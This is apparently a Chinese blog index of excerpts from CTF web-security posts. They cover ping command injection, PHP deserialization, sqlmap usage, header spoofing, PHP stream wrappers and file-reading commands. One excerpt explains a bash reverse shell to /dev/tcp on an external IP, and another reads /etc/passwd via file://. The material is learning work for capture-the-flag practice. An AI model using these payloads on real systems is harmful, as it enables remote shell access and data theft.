摘要:
打开题目以后他让我们输入一个域名,我这里习惯一般填入127.0.0.1 可以发现是一个ping命令,立马想到命令执行。然后进行尝试命令执行的payload_fuzz, 发现这里只有四个字符没有被过滤,其他全报Invalid URL,还有一个神奇的发现点是,当我们输入字符以后, 发现url里面给我们自 阅读全文
摘要:
魔术方法: 注:魔术方法只有在类中被定义以后才可以触发 PHP 将所有以 __(两个下划线)开头的类方法保留为魔术方法,这些都是 PHP 内置的方法。 __construct() 当一个对象创建时被调用, __destruct() 当一个对象销毁时被调用, __wakeup() 使用 unseria 阅读全文
摘要:
一、关于sqlmap的各种参数使用 sqlmap -u http://303329b7-8627-41d9-9e71-45a218a61c49.chall.ctf.show/api/index.php --method=PUT --data="id=1" --random-agent --refer 阅读全文
摘要:
<?php highlight_file(__FILE__); include('flag.php'); $cs = file_get_contents('php://input'); class ctfshow{ public $username='xxxxxx'; public $passwor 阅读全文
摘要:
index.php 看到该题目第一眼,大脑直接一个简单的想法就是通过访问flag.php添加X-Forwarded-For然后POST发送token数据。 但!在本题的环境当中,由于使用了Cloudflare代理导致,Cloudflare 会将 HTTP 代理的 IP 地址附加到这个标头,在两次调用 阅读全文
摘要:
bash -i >& /dev/tcp/49.232.106.183/8080 0>&1 首先,bash -i是打开一个交互的bash,这个最简单。我们先跳过“>&”和“0>&1”,这两个是本文重点,等会再说。先来说“/dev/tcp/”。 /dev/tcp/是Linux中的一个特殊设备,打开这个文 阅读全文
摘要:
一、查看文件内容 1.cat 2.nl 3.tac 4.rev 倒序输出 5.more:一页一页的显示档案内容 6.less:与 more 类似 head:查看头几行 7.tail:查看尾几行 8.od:以二进制的方式读取档案内容 9.vi:一种编辑器,这个也可以查看 10.vim:一种编辑器,这个 阅读全文
摘要:
1.右键查看网页源代码或在url前加上view-source: ,代码审计能力。 2.抓包分析流量查看有无隐藏数据。 3.利用工具去扫描后台目录,查看是否有泄漏网页源代码的文件或者robots.txt文件或者敏感文件等,特别注意phpinfo()中有可能隐藏数据。 4.查看cookie有无隐藏数据。 阅读全文
摘要:
一、基础知识 1.各类型文件的文件头 PNG (png),文件头:89504E47 JPEG (jpg),文件头:FFD8FFE1 GIF (gif),文件头:47494638 TIFF (tif),文件头:49492A00 ZIP Archive (zip),文件头:504B0304(显示字符串一 阅读全文
摘要:
常用: 注:这里的data对大小写敏感,PHP,FILE不敏感,并且data的任意代码执行?>会闭合! 1.file://协议,需要填写绝对路径,只能读取txt文件。后面直接跟绝对路径即可。 file:///etc/passwd 2.php://filter (1)String Filters(字符 阅读全文